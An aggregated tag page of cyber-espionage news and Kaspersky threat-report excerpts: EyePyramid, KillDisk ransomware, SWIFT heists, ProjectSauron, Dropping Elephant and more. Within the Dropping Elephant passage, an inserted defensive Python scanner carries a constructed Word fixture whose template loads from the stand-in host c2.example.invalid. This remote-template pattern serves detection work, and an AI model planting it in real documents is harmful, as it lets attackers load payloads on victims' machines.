
Tag: Cyber Espionage

Sneaky ‘fileless’ malware flung at Israeli targets via booby-trapped Word docs

Spies, bank raiders gravitate to growing stealth technique

A newly uncovered cyber-espionage campaign targeting Israeli organisations relies on "fileless" malware hidden in Microsoft Word documents, a hacker tactic that's becoming a growing menace.…

Sneaky ‘fileless’ malware flung at Israeli targets

Spies, bank raiders gravitate to growing stealth technique

A newly uncovered cyber-espionage campaign targeting Israeli organisations relies on "fileless" malware, a hacker tactic that's becoming a growing menace.…

Researchers claim China trying to hack South Korea missile defense efforts

Deployment of THAAD upsets China, seen as espionage tool.

‘Evidence of Chinese spying’ uncovered on eve of Trump-Xi summit

Gosh, this is awkward...

Evidence of Chinese cyber-espionage against the US has been uncovered on the eve of an important Sino-US presidential summit.…

Brother-and-sister duo arrested over hacking campaign targeting Italy’s bigwigs

EyePyramid operation targeted politicians and business leaders

A hacking operation featuring the EyePyramid trojan successfully compromised the systems of numerous high-profile Italian targets, including two former prime ministers, say Italian police. The victims were targeted by a spear-phishing campaign that served a remote-access trojan codenamed "EyePyramid" as a malicious attachment. Targets of the spying included bankers, businessmen and even several cardinals.

The president of the European Central Bank, Mario Draghi, and two former Italian prime ministers, Matteo Renzi and Mario Monti, were among the targets of the campaign, according to a copy of an Italian arrest warrant obtained by Politico. The malware was used to exfiltrate over 87 gigabytes of data – including usernames, passwords, browsing data and other files – from compromised systems. Federico Maggi, a senior threat researcher at Trend Micro, has published a blog post here and a technical summary (on GitHub) here. Brother and sister Giulio Occhionero, 45, and Maria Occhionero, 48, were arrested in Rome on Tuesday and detained on hacking and espionage charges related to the EyePyramid campaign, Reuters reports.

Investigators appear to be proceeding on the basis that the hacking operation was used to harvest insider intelligence as part of a criminally tainted investment strategy rather than as politically motivated cyber-espionage. The "stolen data was stored in servers in Prior Lake, Minnesota, and Salt Lake City, Utah," according to a court document seen by Reuters. The FBI has seized the servers and will ship them to Italy, the head of Italy's cyber crime unit told the news agency. Hackers behind the spear-phishing campaign used the compromised email accounts of attorneys and associates in several law firms as a platform to launch the second stage of the attacks, targeting businessmen and politicians, according to Trend Micro's Maggi.

Bootnote: Grazie molto to Milan-based reader Alex for the heads-up on this interesting case, which is unsurprisingly getting a lot of coverage in the Italian press.

How to hunt for rare malware

At SAS 2017, on April 1st and 2nd on St. Maarten, Global Director of GReAT Costin Raiu and Principal Security Researchers Vitaly Kamluk and Sergey Mineev will provide YARA training for incident response specialists and malware researchers, who need an effective arsenal for finding malware.

During the training, the experts will give participants access to some of Kaspersky Lab's internal systems, which are otherwise closed to the public, to demonstrate how the company's malware analysts catch rare samples.

After two days, even as a newcomer, you'll walk away with the ability to write rules and start using the tool for hunting malware. You can book your seat now; the class will be limited to a maximum of 15 participants. Each trainer has an impressive portfolio of cyber-espionage campaigns that they have investigated, including Stuxnet, Duqu, Flame, Gauss, Red October, MiniDuke, Turla, Careto/TheMask, Carbanak and Duqu2.

Why YARA training?

Protective measures that were effective yesterday don't guarantee the same level of security tomorrow.
Indicators of Compromise (IoCs) can help you search for footprints of known malware or for an active infection.

But serious threat actors have started to tailor their tools to fit each victim, thus making IoCs much less effective.

Yet good YARA detection rules still allow analysts to find malware, exploits and 0-days which couldn't be found in any other way.

The rules can be deployed in networks and on various multi-scanner systems.

Giveaways

People who go through the training will be able to start writing relatively complex YARA rules for malware – from polymorphic keyloggers all the way up to highly complex malware – that can't be detected easily with strings.

The GReAT trainers will teach how to balance rules, in other words how to write detection rules while minimising the risk of false-positives.

They will also share their experience of what exactly they are looking for when they write YARA rules as part of their everyday jobs.

What are the requirements for participation?

You don't have to be an expert in order to go through this training. It's enough to have basic knowledge of how to use a text editor and the UNIX grep tool, and a basic understanding of what computer viruses are and what binary formats look like. You'll also need your laptop, with YARA v3.4.0 installed on the machine.

Experience with malware analysis, reverse engineering and programming (especially in structured languages) will help you to learn more quickly, but this doesn't mean that you can't learn without it.

Catching a 0-day with YARA

One of the most remarkable cases in which Kaspersky Lab's GReAT used YARA was the very famous Silverlight 0-day: the team started hunting for this after Hacking Team, the Italian company selling "legal surveillance tools" to governments and LEAs, was hacked. One of the stories in the media attracted our researchers' attention: according to the article, a programmer had offered to sell Hacking Team a Silverlight 0-day, an exploit for an obsolete Microsoft plug-in which at some point had been installed on a huge number of computers. GReAT decided to create a YARA rule based on this programmer's older, publicly available proof-of-concept exploits. Our researchers found that he had a very particular style when coding the exploits: he used very specific comments, shellcode and function names.

All of this unique information was used to write a YARA rule — the experts set it to carry out a clear task, basically saying “Go and hunt for any piece of malware that shows the characteristics described in the rule”.

Eventually it caught a new sample; it was a 0-day, and the team reported it to Microsoft immediately.

If you're a scholar…

Surprisingly enough, YARA can be used for any sort of classification, such as finding documents by metadata, email and so on. If you work with any kind of rare information and lack a competitive tool for searching for it, come to St. Maarten in April and join the training – you'll benefit greatly. You are welcome to listen to the podcast to learn how YARA can be used in malware hunting, data analysis and incident response activities. Book a seat at sas.kaspersky.com now to hunt APTs with YARA like a GReAT ninja!

Insane blackhats behind world’s most expensive ransomware ‘forget’ to backup crypto...

Only Linux victims can decrypt warped $247,000 BlackEnergy module – and then only maybe

Variants of the KillDisk data-wiping malware, famous for nuking computers in Ukrainian energy utilities, are now being used in possibly the world's most expensive ransom attacks. Attackers are targeting Windows and Linux desktops and servers and demanding a laughable 222 bitcoins (US$247,000) for the data to be returned. No one has paid; this is a good thing, even for victims laden with cash, since the attackers cannot decrypt files because the encryption keys are neither saved locally nor transmitted to command and control servers.

"Let us emphasise that the cyber criminals behind this KillDisk variant cannot supply their victims with the decryption keys to recover their files, despite those victims paying the extremely large sum demanded by this ransomware," ESET researchers Robert Lipovsky and Peter Kalnai say.

The malware was first a module employed in 2015 attacks against Ukraine's Prykarpattya, Oblenergo, and Kyivoblenergo energy facilities. It is distributed most often through phishing, the tactic used by its suspected Russian authors, and is capable of wrecking thousands of different file types. Those attacks were "artistic", Lipovsky and Kalnai say, using iconography from the hacker hit show Mr Robot. The ransomware message is splashed in the overwritten GRUB bootloader and apologises for encrypting files.

We're 'sorry', reads the GRUB message.

While the KillDisk authors utterly failed in their bid to earn money from ransomware, they avoided encryption mistakes common to other blackhats: they used Triple-DES applied to 4096-byte file blocks, with each file using a different set of 64-bit encryption keys. But they fell flat again by opening a hole that lets Linux users decrypt files – with significant effort and some luck. Windows users have no such option at this stage.

"The recent addition of ransomware functionality seems a bit unusual, as previous attacks were cyber-espionage and cyber-sabotage operations," the researchers say. "[It] seems more like a nail in the coffin, rather than a true ransomware campaign."

Kaspersky Security Bulletin 2016. Review of the year. Overall statistics for...

Introduction

If they were asked to sum up 2016 in a single word, many people around the world – particularly those in Europe and the US – might choose the word 'unpredictable'. On the face of it, the same could apply to cyberthreats in 2016: the massive botnets of connected devices that paralysed much of the Internet in October; the relentless hacking of high-profile websites and data dumps; the SWIFT-enabled bank heists that stole billions of dollars, and more. However, many of these incidents had in fact been predicted, sometimes years ago, by the IT security industry, and the best word for them is probably 'inevitable'.

For cyberthreats, 2016 was the year when "sooner or later" became "now".

Most of all, in 2016, ransomware continued its relentless march across the world – with more new malware families, more modifications, more attacks and more victims. However, there are rays of hope, including the new, collaborative No More Ransom initiative. Kaspersky Lab has designated the revolution in ransomware its Story of the Year for 2016 and you can read more about its evolution and impact here.

Elsewhere on the cybersecurity landscape, targeted cyberespionage attacks, financial theft, 'hacktivism' and vulnerable networks of connected devices all played their part in what has been a tense and turbulent year. This Executive Summary provides an overview of the top threats and statistics for 2016. Full details are included in the accompanying Review & Statistics. It also considers what these threats mean to organisations trying to spot a breach or cyberattack. How ready are businesses to proactively prevent and mitigate a cyberthreat? What can be done to help them?

Six things we learned this year that we didn't know before

1. That the underground economy is more sophisticated and bigger than ever: xDedic – the shady marketplace

In May, we uncovered a large, active cybercriminal trading platform, called xDedic. xDedic listed and facilitated the buying and selling of hacked server credentials. Around 70,000 compromised servers were on offer – although later evidence suggests that there could have been as many as 176,000 – located in organisations around the world. In most cases, the legitimate owners had no idea that one of their servers, humming away in a back room or data center, had been hijacked and was being passed from criminal to criminal. xDedic is not the first underground marketplace, but it is evidence of the growing complexity and sophistication of the black market economic ecosystem.

"xDedic is a hacker's dream, simplifying access to victims, making it cheaper and faster, and opening up new possibilities for both cybercriminals and advanced threat actors." – GReAT

2. That the biggest financial heist did not involve a stock exchange: the SWIFT-enabled transfers

One of the most serious attacks in 2016 was that using the inter-bank network, SWIFT (Society for Worldwide Interbank Financial Telecommunication). In February 2016, hackers used the SWIFT credentials of Bangladesh Central Bank employees to send fraudulent transaction requests to the Federal Reserve Bank of New York, asking it to transfer millions of dollars to various bank accounts in Asia. The hackers were able to get $81 million transferred to the Rizal Commercial Banking Corporation in the Philippines and an additional $20 million to Pan Asia Banking. The campaign was cut short when the bank spotted a typo in one of the transfer requests. You can read the story here. In the following months, further bank attacks using SWIFT credentials came to light.

Following the theft of $100 million, many banks were forced to improve their authentication and SWIFT software update procedures.

3. That critical infrastructure is worryingly vulnerable: the BlackEnergy attacks

BlackEnergy deserves a place in this list even though, strictly speaking, it took place at the end of 2015. However, it was only in early 2016 that the full effect of the BlackEnergy cyber-attack on the Ukrainian energy sector became clear. The attack was unique in terms of the damage it caused. This included disabling the power distribution system in Western Ukraine, wiping software on targeted systems and unleashing a Distributed Denial of Service (DDoS) attack on the technical support services of affected companies. Kaspersky Lab has supported the investigation into BlackEnergy since 2010, with, among other things, an analysis of the tool used to penetrate the target systems. You can find our 2016 report here.

The BlackEnergy cyberattack on the Ukrainian energy sector revealed the vulnerability of critical infrastructures worldwide.

To help organizations working with industrial control systems (ICS) to identify possible points of weakness, Kaspersky Lab experts have conducted an investigation into ICS threats. Their findings are published in the Industrial Control Systems Threat Landscape report.

4. That a targeted attack can have no pattern: the ProjectSauron APT

In 2016 we discovered the ProjectSauron APT: a likely nation-state backed cyberespionage group that has been stealing confidential data from organisations in Russia, Iran and Rwanda – and probably other countries – since June 2011. Our analysis uncovered some remarkable features: for example, the group adopted innovative techniques from other major APTs, improving on their tactics in order to remain undiscovered. Most importantly of all: tools are customized for each given target, reducing their value as Indicators of Compromise (IoCs) for any other victim. An overview of the methods available to deal with such a complex threat can be found here.

ProjectSauron's pattern-less spying platform has far-reaching implications for some basic principles of threat detection.

5. That the online release of vast volumes of data can be an influential tactic: ShadowBrokers and other data dumps

2016 saw a number of remarkable online data dumps. The most famous is probably that by a group calling itself the ShadowBrokers. On August 13, they appeared online claiming to possess files belonging to the ultimate APT predator, the Equation Group. Our research suggests there are similarities between the data dumped by ShadowBrokers and that used by the Equation Group. The initial data dump included a number of unreported zero-days, and there have been further dumps in recent months. The long-term impact of all this activity is unknown, but it has already revealed the huge and rather worrying influence such data dumps can potentially have on public opinion and debate. In 2016 we also witnessed data breaches at beautifulpeople.com, Tumblr, the nulled.io hacker forum, Kiddicare, VK.com, Sage, the official forum of DotA 2, Yahoo, Brazzers, Weebly and Tesco Bank – for motives ranging from financial gain to personal reputation blackmail.

A LinkedIn hack made public in 2016 revealed over a million uses of the password '123456'.

6. That a camera could be part of a global cyber-army: the insecure Internet of Things

Connected devices and systems, from homes and vehicles to hospitals and smart cities, exist to make our lives safer and easier. However, many were designed and manufactured without much thought for security – and sold to people who underestimated the need to protect them with more than default factory security settings.

The risk of connecting everything without proper safeguards – after 2016, need we say more?

As the world now knows, all these millions of insecure connected devices represent a powerful temptation to cybercriminals. In October, attackers used a botnet of over half a million internet-connected home devices to launch a DDoS attack against Dyn – a company that provides DNS services to Twitter, Amazon, PayPal, Netflix and others. The world was shocked, but warnings about unstable IoT security have been around for a long time. For example, in February, we showed how easy it was to find a hospital, gain access to its internal network and take control of an MRI device – locating personal data about patients and their treatment procedures and obtaining access to the MRI device file system. In April, we published the results of our research into, among other things, the vulnerability of city traffic sensors and smart ticket terminals.

Manufacturers need to work with the security industry to implement 'security-by-design'.

Other top threats

Inventive APTs

At least 33 countries were targeted by APTs reported on by Kaspersky Lab.

In February, we reported on Operation Blockbuster, a joint investigation by several major IT security companies into the activities of the Lazarus gang, a highly malicious entity responsible for data destruction.

The Lazarus group is believed to have been behind the attack on Sony Pictures Entertainment in 2014.

Adwind is a cross-platform, multi-functional RAT (Remote Access Tool) distributed openly as a paid service, where the customer pays a fee in return for use of the malicious software. It holds the dubious distinction of being one of the biggest malware platforms currently in existence, with around 1,800 customers in the system by the end of 2015.

Adwind's malware-for-rent had a customer base of 1,800.

APTs everywhere continued to make the most of the fact that not everyone promptly installs new software updates – in May we reported that at least six different groups across the Asia-Pacific and Far East regions, including the newly discovered Danti and SVCMONDR groups, were exploiting the CVE-2015-2545 vulnerability. This flaw enables an attacker to execute arbitrary code using a specially-crafted EPS image file. A patch for the vulnerability was issued back in 2015.

Over six APT groups used the same vulnerability – patched back in 2015.

New zero-days

Zero-days remained a top prize for many targeted attackers. In June, we reported on a cyber-espionage campaign launched by a group named ScarCruft and code-named Operation Daybreak, which was using a previously unknown Adobe Flash Player exploit (CVE-2016-1010). Then in September we discovered a Windows zero-day, CVE-2016-3393, being used by a threat actor known as FruityArmor to mount targeted attacks. In all, new Kaspersky Lab technologies designed to identify and block such vulnerabilities helped us to uncover four zero-days in 2016. The other two are an Adobe Flash vulnerability, CVE-2016-4171, and a Windows EoP (Escalation of Privilege) exploit, CVE-2016-0165.

The hunt for financial gain

Tricking people into either disclosing personal information or installing malware that then seizes the details for their online bank account remained a popular and successful option for cyber-thieves in 2016. Kaspersky Lab solutions blocked attempts to launch such malware on 2,871,965 devices. The share of attacks targeting Android devices increased more than four-fold.

A third of banking malware attacks now target Android devices.

Some APT groups were also more interested in financial gain than cyberespionage. For example, the group behind Metel infiltrated the corporate network of banks in order to automate the roll-back of ATM transactions: gang members could then use debit cards to repeatedly steal money from ATMs without ever affecting the balance on the card. At the end of 2016 this group remains active.

Metel launched targeted attacks on banks – then sent teams to ATMs at night to withdraw the cash.

In June, Kaspersky Lab supported the Russian police in their investigation into the Lurk gang. The collaboration resulted in the arrest of 50 suspects allegedly involved in creating networks of infected computers and the theft of more than 45 million dollars from local banks, other financial institutions and commercial organizations. During the investigation, researchers spotted that users attacked by Lurk had the remote administration software Ammyy Admin installed on their computers. This led to the discovery that the official Ammyy Admin website had most probably been compromised, with the Trojan being downloaded to users' computers along with the legitimate Ammyy Admin software.

The takedown of the Lurk gang was the largest ever arrest of hackers in Russia.

The ultimate vulnerability: people

2016 also revealed that targeted attack campaigns don't always need to be technically advanced in order to be successful. Human beings – from hapless employees to malicious insiders – often remained the easiest access route for attackers and their tools. In July, we reported on a group called Dropping Elephant (also known as 'Chinastrats' and 'Patchwork'). Using high-quality social engineering combined with old exploit code and some PowerShell-based malware, the group was able to successfully steal sensitive data from high-profile diplomatic and economic organisations linked to China's foreign relations.

Dropping Elephant and Operation Ghoul confirmed the fearsome power of high-quality social engineering.

Further, Operation Ghoul sent spear-phishing e-mails that appeared to come from a bank in the UAE to top and middle level managers of numerous companies. The messages claimed to offer payment advice from the bank and attached a look-alike SWIFT document containing malware.

"Cybercriminals are using insiders to gain access to telecommunications networks and subscriber data, recruiting disaffected employees through underground channels or blackmailing staff using compromising information gathered from open sources." – Threat Intelligence Report for the Telecommunications Industry

Mobile advertising

The main mobile threats in 2016 were advertising Trojans able to obtain 'root' or superuser rights on an infected Android device – a level of access that allowed them to do pretty much whatever they wanted. This included hiding in the system folder, thereby making themselves almost impossible to delete, and silently installing and launching different apps that aggressively display advertising. They can even buy new apps from Google Play.

22 of the 30 most popular Trojans in 2016 are advertising Trojans – twice as many as in 2015.

Many such Trojans were distributed through the Google Play Store: some of them were installed more than 100,000 times, and one – an infected Pokemon GO Guide app – was installed more than 500,000 times.

Malware distributed through Google Play was downloaded hundreds of thousands of times.

One Android Trojan installed and even updated as a 'clean' (malware-free) app before hitting targets with an infected version. Others, including Svpeng, used the Google AdSense advertising network for distribution. Further, some Trojans found new ways to bypass Android security features – in particular the screen overlays and the need to request permission before opening a new app – forcing the user to sign over the access rights the Trojan was looking for. Mobile ransomware also evolved to make use of overlays, blocking rather than encrypting data since this is generally backed up.

To read more on these stories, please download the full annual Review for 2016 here. For an in-depth look at the Statistics for 2016, please register to download the Statistics report here.

The impact on business

The 2016 threat landscape indicates a growing need for security intelligence

The Kaspersky Security Bulletin 2016 highlights the rise of complex and damaging cybersecurity threats, many of which have a far-reaching impact on businesses. This impact is also reflected in our Corporate IT Security Risks Reports (1, 2) based on a 2016 survey of more than 4000 businesses worldwide. Among other things, the survey asked companies about the most crucial metric of incident detection and response: time.

Incident detection time is critical

Previously unreleased findings from the research show that the typical time required to detect an IT security event is several days – 28.7% of companies said it took them that long to detect a security breach on average.

Chart: Time required to detect an IT security event

Only 8.2% of businesses managed to detect security breaches almost instantly, and for 19.1% of businesses it took several weeks to detect a serious security event. When we asked how they eventually detected a long-standing breach, the replies were revealing.

Going beyond prevention

Chart: Average time frame required to detect a security event, across all security events within the last 12 months

In this chart we combine the average time to discover a security event with the responses we received on how businesses detected a breach. Apparently, businesses that struggle to detect a breach quickly eventually spot it through one or more of the following: an external or internal security audit, or, sadly, notification from a third party. It turns out that for these businesses a security audit of any kind is the best measure of 'last resort' to finally bring it to light. But should it be only a last resort? This is where our report detects an obvious discrepancy between theory and practice. Although 65% of businesses admit that a security audit is an effective security measure, less than half of the companies surveyed (48%) have conducted such an audit in the last 12 months. Further, 52% of companies operate under the assumption that their IT security will inevitably be compromised at some point, although 48% are not ready to accept this. In short: many businesses find a structured detection and response strategy difficult to embrace.

The cost of delay

It is safe to assume that the longer it takes to detect a security breach, the higher the mitigation costs and the greater the potential damage. The results reveal the shocking truth that failure to discover an attack within a few days results in a doubling, or more, of the costs.

Chart: Cost of recovery vs. time needed to discover a security breach for enterprises

For enterprises, an attack undiscovered for a week or more costs 2.77 times that of a breach detected almost instantly. SMBs end up paying 3.8 times more to recover from an incident detected too late. It is clear that better detection significantly reduces business costs. But the implementation of incident detection and response strategies is quite different from ensuring proper prevention. The latter provides a choice of well-established corporate solutions. The former requires security intelligence, a deep knowledge of the threat landscape, and security talent capable of applying that expertise to the unique specifics of a company. According to our special Corporate IT Security Risks report, businesses that struggle to attract security experts end up paying twice as much for their recovery after an incident.

Kaspersky Lab's solution: turning intelligence into protection

In 2016 Kaspersky Lab significantly expanded its portfolio with products like Kaspersky Anti-Targeted Attack Platform and security services like Penetration Testing and Threat Data Feeds, all to help meet customer needs for better detection and response. Our plan is to offer security intelligence via any means necessary: with a technology to detect targeted threats, a service to analyze and respond to a security event, and intelligence that helps investigate an issue properly. We appreciate that, for many businesses, going beyond prevention is a challenge. But even a single targeted attack that is detected early and mitigated rapidly is worth the investment – and increases the chances that the next assault on the corporate infrastructure is prevented outright.

Caribbean scuba diving with IT-security in mind

Dare to submit your research proposal before December 1, 2016 to dive into undiscovered and uncharted cybercrimes, hacks, espionage and much more at the Security Analyst Summit – April 2-6, 2017 on the Caribbean island of St. Maarten.

There are four months left before Kaspersky Lab's Security Analyst Summit on the Caribbean island of St Maarten, an invitation-only conference. If you still haven't submitted your individual proposal, you'd better hurry up. There's only one week left before the SAS17 program committee will start evaluating the abstracts. The summit will welcome those with new studies and tools, vulnerability reports, creative ideas, concepts or their results; insights into nation-state cyber-espionage and government surveillance; research into attacks against financial institutions and critical infrastructure; and observations on mobile systems and the IoT cyber-risk landscape. You'll join the leading voices in the IT security industry – the chosen few – for knowledge and information sharing: senior executives from business organizations, global law enforcement agencies and CERTs, independent researchers and journalists. Previous events were joined by members of leading global companies, such as Samsung, Adobe, Microsoft, BlackBerry, CISCO, Boeing, Interpol, the World Bank, Team Cymru, The ShadowServer Foundation, ICSA Labs and Fidelis Cybersecurity Solutions. And every year SAS proves that IT security has no borders.

Requirements for submissions:

Individual proposals should be no more than 350 words in length. SAS has a ground rule: nobody gets to speak from the stage for more than 30 minutes (the longest duration allowed for a keynote presentation), while everyone else gets 20 minutes maximum. Proposals should include the title of the paper and should clearly spell out the focus and goal of the presentation. The deadline for submissions is December 1, 2016. You can send your abstract directly to sasCFP@kaspersky.com.

The Program committee consists of six independent members, who evaluate the papers separately. They are Kaspersky Lab and external experts who share the SAS core value: uncompromising research. Have you been good this year? The program committee will check soon. Submit your abstract, find SPF20+ sunscreen, join the SAS family, follow @KasperskySAS and see how much fun it is – SAS2014, SAS2015 and SAS2016!

IT threat evolution Q3 2016

Download the full report (PDF)

Overview

Targeted attacks and malware campaigns

Dropping Elephant

Targeted attack campaigns don’t need to be technically advanced in order to be successful. In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware, this group was able to steal sensitive data from its victims. This group, which has been active since November 2015, targets high-profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims. The attackers use a combination of spear-phishing e-mails and watering-hole attacks.

The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server.

The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system; once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins.

In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries.

The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites. If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object.
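The first stage described above works because an Office document can declare a relationship whose target lies outside the package, so merely opening it causes a request to the attackers’ server. As an added, defender-side example (not code from the report or from Kaspersky Lab), the Python below inspects the relationship parts of an OOXML package and lists every external, network-reachable target; the minimal package layout and the host c2.example.invalid are constructed inputs.

```python
"""Pre-open check for Office documents that load remote content.

Added example for this page, not code from the report or from Kaspersky Lab.
An OOXML document (.docx/.pptx) is a zip of parts; a part reaches outside the
package only through a relationship declared with TargetMode="External" in a
.rels part. Listing those relationships tells a mail gateway which attachments
will phone home when opened. Package layout and URLs below are constructed.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def external_relationships(package_bytes):
    """Return (rels_part, short_type, target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, short_type, rel.get("Target", "")))
    return found


def is_remote_target(target):
    """True when the target is a URL or UNC path, i.e. opening the document causes network traffic."""
    return urlparse(target).scheme.lower() in REMOTE_SCHEMES or target.startswith("\\\\")


def remote_content(package_bytes):
    """The subset of external relationships whose target is fetched over the network."""
    return [hit for hit in external_relationships(package_bytes) if is_remote_target(hit[2])]


# --- constructed minimal packages for the demo (not real samples) -------------
CONTENT_TYPES = (
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/></Types>'
)
ROOT_RELS = (
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sofficeDocument" '
    'Target="word/document.xml"/></Relationships>' % (REL_NS, OFFICE_REL)
)
# settings.xml.rels that only references a part inside the package: harmless.
BENIGN_SETTINGS_RELS = (
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sstyles" '
    'Target="styles.xml"/></Relationships>' % (REL_NS, OFFICE_REL)
)
# settings.xml.rels with an attached template fetched from a server; the host is a placeholder.
REMOTE_SETTINGS_RELS = (
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%sattachedTemplate" '
    'TargetMode="External" Target="http://c2.example.invalid/template.dotm"/></Relationships>'
    % (REL_NS, OFFICE_REL)
)


def build_docx(settings_rels):
    """Assemble just enough of a .docx in memory for the scanner to inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_SETTINGS_RELS), ("remote", REMOTE_SETTINGS_RELS)):
        hits = remote_content(build_docx(rels))
        print(label, "->", hits if hits else "no remote content")
```

The same scan applies unchanged to .pptx and .xlsx packages, since the relationship model is shared across OOXML formats.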

The attackers sometimes e-mail links to their watering-hole website.
In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets. The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented.

At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware.

Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high-quality social engineering.

ProjectSauron

In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization.

Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors. ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques.

The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered. One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used.

This makes the use of traditional Indicators of Compromise (IoC) almost useless.

This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS), enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks. Key features of ProjectSauron: core implants that are unique for each victim; use of legitimate software update scripts; use of backdoors that download new modules or run commands in memory only; focus on information relating to custom network encryption software; use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in the Flame and Animal Farm attacks); use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data; use of multiple exfiltration mechanisms to conceal the transfer of data in day-to-day traffic. The method used to initially infect victims remains unknown. The strictly single use of unique elements (such as control servers and encryption keys), in addition to the adoption of cutting-edge techniques from other major threat groups, is new.

The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here.

ShadowBrokers

In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group.

They provided links to two PGP encrypted archives.

They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation). Having uncovered the Equation group in February 2015, we were interested in examining the first archive.
It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013. The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively).

The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations.

The implementation is functionally identical to that found in the Equation malware – and has not been seen elsewhere. The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group.

Operation Ghoul

In June, we noticed a wave of spear-phishing e-mails with malicious attachments.

The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE.

The messages claimed to offer payment advice from the bank and included an attached SWIFT document.

But the archive really contained malware.

Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab. The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia.

Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations. The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications.

This data is sent to the group’s C2 servers. The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market. The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy.

Malware stories

Lurk

In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks.

The police estimate the losses caused by this Trojan at around $45 million. During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victims’ computers along with the legitimate software. The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested.
